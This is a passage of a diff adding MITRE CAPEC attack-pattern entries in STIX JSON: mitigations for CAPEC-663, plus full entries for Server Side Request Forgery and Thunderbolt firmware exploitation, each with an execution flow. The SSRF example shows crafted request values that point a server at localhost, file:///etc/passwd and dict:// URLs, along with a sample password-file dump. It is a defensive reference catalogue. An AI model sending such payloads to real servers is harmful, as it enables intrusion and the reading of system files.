"3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e424f3f2-c61b-4d4a-9e40-eef4438e644d", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3f5fcaf8-e704-4973-b9d1-748021eb261f", + "spec_version": "2.1", + "target_ref": "attack-pattern--efbf3dcf-9f19-45de-9f49-caa87fd34681", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Disable SharedArrayBuffer for Web Browsers", + "id": "course-of-action--cba702aa-e3c0-4659-b0a4-5884aa8b6ed5", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-663-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--183b50f2-3b70-46cf-94a6-bfa6c657652d", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--cba702aa-e3c0-4659-b0a4-5884aa8b6ed5", + "spec_version": "2.1", + "target_ref": "attack-pattern--efbf3dcf-9f19-45de-9f49-caa87fd34681", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Disable Copy-on-Write between Cloud VMs", + "id": "course-of-action--d4954d97-b73a-4bed-952e-83b9a609fc81", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-663-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e9cc3819-f8ef-4590-96ab-5d9ddb6a9bb6", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d4954d97-b73a-4bed-952e-83b9a609fc81", + "spec_version": "2.1", + "target_ref": "attack-pattern--efbf3dcf-9f19-45de-9f49-caa87fd34681", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Privilege Checks on Cache Flush Instructions", + "id": "course-of-action--a18a858a-e419-47d9-92aa-3db4c41c67fe", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-663-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--224b0c6b-54cf-408c-9215-be2bc2bb613b", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a18a858a-e419-47d9-92aa-3db4c41c67fe", + "spec_version": "2.1", + "target_ref": "attack-pattern--efbf3dcf-9f19-45de-9f49-caa87fd34681", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Non-inclusive Cache Memories to prevent Flush+Reload Attacks", + "id": "course-of-action--6acfbc2d-97e0-447f-a683-2eebc9157e84", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-663-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0cbb16a5-1749-47ba-8527-a912d9298189", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6acfbc2d-97e0-447f-a683-2eebc9157e84", + "spec_version": "2.1", + "target_ref": "attack-pattern--efbf3dcf-9f19-45de-9f49-caa87fd34681", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary exploits improper input validation by submitting maliciously crafted input to a target application running on a server, with the goal of forcing the server to make a request either to itself, to web services running in the server’s internal network, or to external third parties. If successful, the adversary’s request will be made with the server’s privilege level, bypassing its authentication controls. This ultimately allows the adversary to access sensitive data, execute commands on the server’s network, and make external requests with the stolen identity of the server. Server Side Request Forgery attacks differ from Cross Site Request Forgery attacks in that they target the server itself, whereas CSRF attacks exploit an insecure user authentication mechanism to perform unauthorized actions on the user's behalf.\n ", + "external_references": [ + { + "external_id": "CAPEC-664", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/664.html" + }, + { + "external_id": "CWE-918", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/918.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "description": "OWASP SSRF Bible, 2017--01---26, OWASP", + "external_id": "REF-644", + "source_name": "reference_from_CAPEC", + "url": "https://cheatsheetseries.owasp.org/assets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet_SSRF_Bible.pdf" + }, + { + "description": "Server Side Request Forgery, PortSwigger", + "external_id": "REF-645", + "source_name": "reference_from_CAPEC", + "url": "https://portswigger.net/web-security/ssrf" + }, + { + "description": "CallStranger Vulnerability, 2020--06---08, Yunus Cadirici", + "external_id": "REF-646", + "source_name": "reference_from_CAPEC", + "url": "https://github.com/yunuscadirci/CallStranger" + } + ], + "id": "attack-pattern--f231b993-ed39-40cf-adfb-9828ddcfc642", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Server Side Request Forgery", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--fd669b7d-0e79-473c-9808-a860dfb0c871", + "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "attack-pattern--2a6131f7-30af-4529-be4e-bc3b7bf22009", + "attack-pattern--5a33bee7-5ec9-4e75-9bf6-99fdaca8699c", + "attack-pattern--fd114e53-fdc0-4eef-8254-40ef0d4ea482" + ], + "x_capec_child_of_refs": [ + "attack-pattern--8f665166-dfd1-40cb-91e8-b78bee1ceb6a" + ], + "x_capec_consequences": { + "Availability": [ + "Modify Data", + "Resource Consumption" + ], + "Confidentiality": [ + "Modify Data", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n An e-commerce website allows a customer to filter results by specific categories. When the customer selects the category of choice, the web shop queries a back-end service to retrieve the requested products. The request may look something like:\n \n POST /product/category HTTP/1.0\n Content-Type: application/x-www-form-urlencoded\n Content-Length: 200\n vulnerableService=http://vulnerableshop.net:8080/product/category/check%3FcategoryName%3DsomeCategory\n \n A malicious user can modify the request URL to look like this instead:\n \n POST /product/category HTTP/1.0\n Content-Type: application/x-www-form-urlencoded\n Content-Length: 200\n vulnerableService=http://localhost/server-status\n \n or\n \n vulnerableService = file:///etc/passwd\n \n or\n \n vulnerableService=dict://localhost:12345/info\n \n If the exploit is successful, the server may return the data requested by the adversary\n \n root:!:0:0::/:/usr/bin/ksh\n daemon:!:1:1::/etc:\n bin:!:2:2::/bin:\n sys:!:3:3::/usr/sys:\n adm:!:4:4::/var/adm:\n uucp:!:5:5::/usr/lib/uucp:\n guest:!:100:100::/home/guest:\n nobody:!:4294967294:4294967294::/:\n lpd:!:9:4294967294::/:\n lp:*:11:11::/var/spool/lp:/bin/false\n invscout:*:200:1::/var/adm/invscout:/usr/bin/ksh\n nuucp:*:6:5:uucp login user:/var/spool/uucppublic:/usr/sbin/uucp/uucico\n paul:!:201:1::/home/paul:/usr/bin/ksh\n jdoe:*:202:1:My name:/home/myname:/usr/bin/ksh\n \n ", + "\n The CallStranger attack is an observed example of SSRF. It specifically targets the UPnP (Universal Plug and Play) protocol used by various network devices and gaming consoles. To execute the attack, an adversary performs a scan of the LAN to discover UPnP enabled devices, and subsequently a list of UPnP services they use. Once the UPnP service endpoints are listed, a vulnerability in the UPnP protocol is used to send these endpoints as encrypted to a verification server via the UPnP Callback method. Because the encryption is done on the client side, the server returns an encrypted list of services which is decrypted on the client side. The adversary then has a list of services running the vulnerable UPnP protocol, which the adversary can leverage to make spoofed requests. [REF-646]\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find target application: Find target web application that accepts a user input and retrieves data from the server

Experiment

  1. Examine existing application requests: Examine HTTP/GET requests to view the URL query format. Adversaries test to see if this type of attack is possible through weaknesses in an application's protection to Server Side Request Forgery

    2. Techniques
    Attempt manipulating the URL to retrieve an error response/code from the server to determine if URL/request validation is done.
    Use a list of XSS probe strings to specify as parameters to known URLs. If possible, use probe strings with unique identifiers.
    Create a GET request with a common server file path such as /etc/passwd as a parameter and examine output.

Exploit

  1. Malicious request: Adversary crafts a malicious URL request that assumes the privilege level of the server to query internal or external network services and sends the request to the application

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Server must be running a web application that processes HTTP requests." + ], + "x_capec_resources_required": [ + "[None] No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "High": "The adversary will be required to access internal resources, extract information, or leverage the services running on the server to perform unauthorized actions such as traversing the local network or routing a reflected TCP DDoS through them.", + "Medium": "The adversary will have to detect the vulnerability through an intermediary service or specify maliciously crafted URLs and analyze the server response." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Handling incoming requests securely is the first line of action to mitigate this vulnerability. This can be done through URL validation.", + "id": "course-of-action--b5e3f94c-6f9c-4f58-b75f-fe7481005864", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-664-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6377c3e9-f7ce-470a-935c-754995e66989", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b5e3f94c-6f9c-4f58-b75f-fe7481005864", + "spec_version": "2.1", + "target_ref": "attack-pattern--f231b993-ed39-40cf-adfb-9828ddcfc642", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Further down the process flow, examining the response and verifying that it is as expected before sending would be another way to secure the server.", + "id": "course-of-action--16973fac-22ce-4b43-b7f4-e6167f990299", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-664-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--df4b3787-fb80-4016-b3ec-7b279539e710", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--16973fac-22ce-4b43-b7f4-e6167f990299", + "spec_version": "2.1", + "target_ref": "attack-pattern--f231b993-ed39-40cf-adfb-9828ddcfc642", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Allowlist the DNS name or IP address of every service the web application is required to access is another effective security measure. This ensures the server cannot make external requests to arbitrary services.", + "id": "course-of-action--ac64feac-f01a-4022-85b1-0b00aca231bc", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-664-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--814c7fba-41b2-4ab4-b0a9-1c73b58b395f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ac64feac-f01a-4022-85b1-0b00aca231bc", + "spec_version": "2.1", + "target_ref": "attack-pattern--f231b993-ed39-40cf-adfb-9828ddcfc642", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Requiring authentication for local services adds another layer of security between the adversary and internal services running on the server. By enforcing local authentication, an adversary will not gain access to all internal services only with access to the server.", + "id": "course-of-action--b33aeecf-33f4-456f-8711-f726e12e6fe1", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-664-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fab9925e-dd41-45aa-bae8-f2d7f2595513", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b33aeecf-33f4-456f-8711-f726e12e6fe1", + "spec_version": "2.1", + "target_ref": "attack-pattern--f231b993-ed39-40cf-adfb-9828ddcfc642", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Enforce the usage of relevant URL schemas. By limiting requests be made only through HTTP or HTTPS, for example, attacks made through insecure schemas such as file://, ftp://, etc. can be prevented.", + "id": "course-of-action--219ed2d5-238f-4286-a245-1c13e252cf24", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-664-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--06da039c-0cd5-4ee7-a6e3-2c773096bb9f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--219ed2d5-238f-4286-a245-1c13e252cf24", + "spec_version": "2.1", + "target_ref": "attack-pattern--f231b993-ed39-40cf-adfb-9828ddcfc642", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary leverages a firmware weakness within the Thunderbolt protocol, on a computing device to manipulate Thunderbolt controller firmware in order to exploit vulnerabilities in the implementation of authorization and verification schemes within Thunderbolt protection mechanisms. Upon gaining physical access to a target device, the adversary conducts high-level firmware manipulation of the victim Thunderbolt controller SPI (Serial Peripheral Interface) flash, through the use of a SPI Programing device and an external Thunderbolt device, typically as the target device is booting up. If successful, this allows the adversary to modify memory, subvert authentication mechanisms, spoof identities and content, and extract data and memory from the target device. Currently 7 major vulnerabilities exist within Thunderbolt protocol with 9 attack vectors as noted in the Execution Flow.\n ", + "external_references": [ + { + "external_id": "CAPEC-665", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/665.html" + }, + { + "external_id": "CWE-345", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/345.html" + }, + { + "external_id": "CWE-353", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/353.html" + }, + { + "external_id": "CWE-288", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/288.html" + }, + { + "external_id": "CWE-1188", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1188.html" + }, + { + "external_id": "CWE-862", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/862.html" + }, + { + "description": "Exploitation for Defensive Evasion", + "external_id": "T1211", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1211" + }, + { + "description": "Pre-OS Boot: Component Firmware", + "external_id": "T1542.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1542/002" + }, + { + "description": "Modify Authentication Process", + "external_id": "T1556", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1556" + }, + { + "description": "Björn Ruytenberg, Thunderspy When Lighting Strikes Thrice: Breaking Thunderbolt 3 Security, 2020, Eindhoven University of Technology", + "external_id": "REF-647", + "source_name": "reference_from_CAPEC", + "url": "https://thunderspy.io/" + }, + { + "description": "Björn Ruytenberg, Breaking Thunderbolt Protocol Security: Vulnerability Report, 2020--04---17, Eindhoven University of Technology", + "external_id": "REF-648", + "source_name": "reference_from_CAPEC", + "url": "https://thunderspy.io/assets/reports/breaking-thunderbolt-security-bjorn-ruytenberg-20200417.pdf" + }, + { + "description": "Liam Tung, Thunderbolt flaws affect millions of computers – even locking unattended devices won't help, 2020--05---11, ZDNet", + "external_id": "REF-649", + "source_name": "reference_from_CAPEC", + "url": "https://www.zdnet.com/article/thunderbolt-flaws-affect-millions-of-computers-even-locking-unattended-devices-wont-help/" + }, + { + "description": "Liam Tung, Microsoft: Worried about Thunderbolt attacks? Get a Windows 10 Secured-Core PC, 2020--05---14, ZDNet", + "external_id": "REF-650", + "source_name": "reference_from_CAPEC", + "url": "https://www.zdnet.com/article/microsoft-worried-about-thunderbolt-attacks-get-a-windows-10-secured-core-pc/" + }, + { + "description": "Jon Porter, Thunderbolt flaw allows access to a PC’s data in minutes, 2020--05---11, The Verge", + "external_id": "REF-651", + "source_name": "reference_from_CAPEC", + "url": "https://www.theverge.com/2020/5/11/21254290/thunderbolt-security-vulnerability-thunderspy-encryption-access-intel-laptops" + }, + { + "description": "Jerry Bryant, MORE INFORMATION ON THUNDERBOLT(TM) SECURITY, 2020--05---10, Intel Corporation", + "external_id": "REF-652", + "source_name": "reference_from_CAPEC", + "url": "https://blogs.intel.com/technology/2020/05/more-information-on-thunderspy/#gs.0o6pmk" + } + ], + "id": "attack-pattern--4317ab6c-93e4-4c5a-a814-0cd2752c61b9", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Exploitation of Thunderbolt Protection Flaws", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a46718a5-0206-44da-a4f8-b1943f85188b" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "\n An adversary steals a password protected laptop that contains a Thunderbolt 3 enabled port, from a work environment. The adversary uses a screw driver to remove the back panel of the laptop and connects a SPI Programming device to the Thunderbolt Host Controller SPI Flash of the stolen victim device to interface with it on the adversary's own Thunderbolt enabled device via Thunderbolt cables. The SPI Programming device is utilized to execute scripts/tools from the adversary's own system to copy, parse, and modify the victim's Thunderbolt firmware stored on SPI Flash. The device UUID value is obtained, by computing the appropriate offset based upon Thunderbolt firmware version and the OS of victim device, from the DROM section of victim Thunderbolt host controller firmware image. The firmware image is written to adversary Thunderbolt host controller SPI flash to clone and spoof victim device identity. The adversary reboots the victim device, with the victim device identifying the Thunderbolt connection of the adversary's Thunderbolt device as itself and enables PCIe tunneling. The adversary finally transfers the hard drive and memory contents of victim device across Thunderbolt connection.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey physical victim environment and potential Thunderbolt system targets: The adversary monitors the target's physical environment to identify systems with Thunderbolt interfaces, identify potential weaknesses in physical security in addition to periods of nonattendance by the victim over their Thunderbolt interface equipped devices, and when the devices are in locked or sleep state.

  2. Evaluate the target system and its Thunderbolt interface: The adversary determines the device's operating system, Thunderbolt interface version, and any implemented Thunderbolt protections to plan the attack.

Experiment

  1. Obtain and/or clone firmware image: The adversary physically manipulates Thunderbolt enabled devices to acquire the firmware image from the target and/or adversary Thunderbolt host controller's SPI (Serial Peripheral Interface) flash.

    2. Techniques
    Disassemble victim and/or adversary device enclosure with basic tools to gain access to Thunderbolt controller SPI flash by connecting adversary SPI programmer.
    Adversary connects SPI programmer to adversary-controlled Thunderbolt enabled device to obtain/clone victim thunderbolt controller firmware image through tools/scripts.
    Clone firmware image with SPI programmer and tools/scripts on adversary-controlled device.

  2. Parse and locate relevant firmware data structures and information based upon Thunderbolt controller model, firmware version, and other information: The acquired victim and/or adversary firmware image is parsed for specific data and other relevant identifiers required for exploitation, based upon the victim device information and firmware version.

    3. Techniques
    Utilize pre-crafted tools/scripts to parse and locate desired firmware data and modify it.
    Locate DROM (Device Read Only Memory) data structure section and calculate/determine appropriate offset to replicate victim device UUID.
    Locate ACL (Access Control List) data structure and calculate/determine appropriate offsets to identify victim device UUID.
    Locate data structure containing challenge-response key information between appropriate offsets.

  3. Disable Thunderbolt security and prevent future Thunderbolt security modifications (if necessary): The adversary overrides the target device's Thunderbolt Security Level to \"None\" (SL0) and/or enables block protections upon the SPI flash to prevent the ability for the victim to perform and/or recognize future Thunderbolt security modifications as well as update the Thunderbolt firmware.

    4. Techniques
    The adversary-controlled Thunderbolt device, connected to SPI programmer and victim device via Thunderbolt ports, is utilized to execute commands within tools/scripts to disable SPI flash protections, modify Thunderbolt Security Level, and enable malicious SPI flash protections.

  4. Modify/replace victim Thunderbolt firmware image: The modified victim and/or adversary thunderbolt firmware image is written to attacker SPI flash.

Exploit

  1. Connect adversary-controlled thunderbolt enabled device to victim device and verify successful execution of malicious actions: The adversary needs to determine if their exploitation of selected vulnerabilities had the intended effects upon victim device.

    2. Techniques
    Observe victim device identify adversary device as the victim device and enables PCIe tunneling.
    Resume victim device from sleep, connect adversary-controlled device and observe security is disabled and Thunderbolt connectivity is restored with PCIe tunneling being enabled.
    Observe that in UEFI or Thunderbolt Management Tool/UI that the Security Level does not match adversary modified Security Level of \"None\" (SL0)
    Observe after installation of Firmware update that within Thunderbolt Management UI the \"NVM version\" is unchanged/same prior to the prompt of successful Firmware update/installation.

  2. Exfiltration of desired data from victim device to adversary device: Utilize PCIe tunneling to transfer desired data and information from victim device across Thunderbolt connection.

", + "x_capec_likelihood_of_attack": "Low", + "x_capec_peer_of_refs": [ + "attack-pattern--96c60498-fdd4-4f9f-a21f-c1a4ee84f0f3", + "attack-pattern--bd4f8f46-1bc7-40a9-b15a-e36b7671cf5b", + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b" + ], + "x_capec_prerequisites": [ + "The adversary needs at least a few minutes of physical access to a system with an open Thunderbolt port, version 3 or lower, and an external thunderbolt device controlled by the adversary with maliciously crafted software and firmware, via an SPI Programming device, to exploit weaknesses in security protections." + ], + "x_capec_resources_required": [ + "SPI Programming device capable of modifying/configuring or replacing the firmware of Thunderbolt device stored on SPI Flash of target Thunderbolt controller, as well as modification/spoofing of adversary-controlled Thunderbolt controller.", + "Precrafted scripts/tools capable of implementing the modification and replacement of Thunderbolt Firmware.", + "Thunderbolt-enabled computing device capable of interfacing with target Thunderbolt device and extracting/dumping data and memory contents of target device." + ], + "x_capec_skills_required": { + "High": "Detailed knowledge on scripting and SPI programming in order to configure and modify Thunderbolt controller firmware and software configurations." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Kernel Direct Memory Access Protection", + "id": "course-of-action--b971f4a8-9aee-4df6-b6ad-5af2b957670b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-665-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a0e0f629-1901-46f1-84f7-14f999416101", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b971f4a8-9aee-4df6-b6ad-5af2b957670b", + "spec_version": "2.1", + "target_ref": "attack-pattern--4317ab6c-93e4-4c5a-a814-0cd2752c61b9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Enable UEFI option USB Passthrough mode - Thunderbolt 3 system port operates as USB 3.1 Type C interface", + "id": "course-of-action--6664c7ff-319e-4b06-997e-26ec9df89dad", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-665-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b8cd41ad-b8ed-421f-9327-7fd7d7f1bb72", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6664c7ff-319e-4b06-997e-26ec9df89dad", + "spec_version": "2.1", + "target_ref": "attack-pattern--4317ab6c-93e4-4c5a-a814-0cd2752c61b9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Enable UEFI option DisplayPort mode - Thunderbolt 3 system port operates as video-only DP interface", + "id": "course-of-action--49c46069-9202-46e1-8dea-548befc52658", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-665-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--92fe9893-60f3-4669-b1b1-49ee6fe775e5", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--49c46069-9202-46e1-8dea-548befc52658", + "spec_version": "2.1", + "target_ref": "attack-pattern--4317ab6c-93e4-4c5a-a814-0cd2752c61b9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Enable UEFI option Mixed USB/DisplayPort mode - Thunderbolt 3 system port operates as USB 